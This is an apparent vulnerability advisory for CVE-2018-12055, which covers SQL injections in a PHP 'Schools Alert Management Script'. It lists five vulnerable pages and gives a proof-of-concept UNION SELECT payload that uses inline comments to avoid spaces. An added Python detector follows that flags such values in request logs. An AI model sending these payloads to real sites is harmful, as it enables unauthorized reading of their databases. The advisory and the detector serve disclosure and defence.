[CVE-2018-12055] Schools Alert Management Script Multiple SQL Injections #2

Open
@unh3x

=================
Schools Alert Management Script - SQL Injections

Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12055

=================
Vulnerable cgi:

  1. contact_us.php
  2. faq.php
  3. about.php
  4. photo_gallery.php
  5. privacy.php

=================
Proof of Concept:

POST http://localhost/[PATH]/photo_gallery.php
DATA  xxx'/**/union/**/all/**/select/**/1,user(),3,4#
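For defenders reviewing request logs or writing a filter rule for the scripts listed above, the following is an added example (not part of the original advisory, and not the vendor's code) that flags values using the comment-as-whitespace form seen in the proof of concept. The function names and the sample records are constructed for illustration; the advisory does not name the vulnerable parameter, so the check works on raw values.

```python
import re
from urllib.parse import unquote_plus

# MySQL treats an inline comment such as /**/ as a token separator, so the
# PoC value contains no literal spaces. Replace comments with a space first.
_INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
_UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")


def normalize(value: str) -> str:
    """URL-decode once, turn SQL inline comments into spaces, collapse whitespace."""
    decoded = unquote_plus(value)
    no_comments = _INLINE_COMMENT.sub(" ", decoded)
    return re.sub(r"\s+", " ", no_comments).strip().lower()


def flag_union_select(value: str) -> bool:
    """True when the normalized value contains a UNION [ALL] SELECT sequence."""
    return bool(_UNION_SELECT.search(normalize(value)))


def scan(records):
    """records: iterable of (path, raw_value). Returns the flagged pairs."""
    return [(path, value) for path, value in records if flag_union_select(value)]


# Constructed sample records: the advisory's PoC value as typed, the same
# value as it would appear URL-encoded in a form body, and two benign values.
SAMPLE = [
    ("/photo_gallery.php", "xxx'/**/union/**/all/**/select/**/1,user(),3,4#"),
    ("/photo_gallery.php",
     "xxx%27%2F**%2Funion%2F**%2Fall%2F**%2Fselect%2F**%2F1%2Cuser()%2C3%2C4%23"),
    ("/contact_us.php", "sports day 2018"),
    ("/faq.php", "student union elections"),
]

if __name__ == "__main__":
    for path, value in scan(SAMPLE):
        print(f"flagged {path}: {normalize(value)}")
```

A match is a triage signal only. The fix for the affected pages is to bind user input through prepared statements instead of concatenating it into the query.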
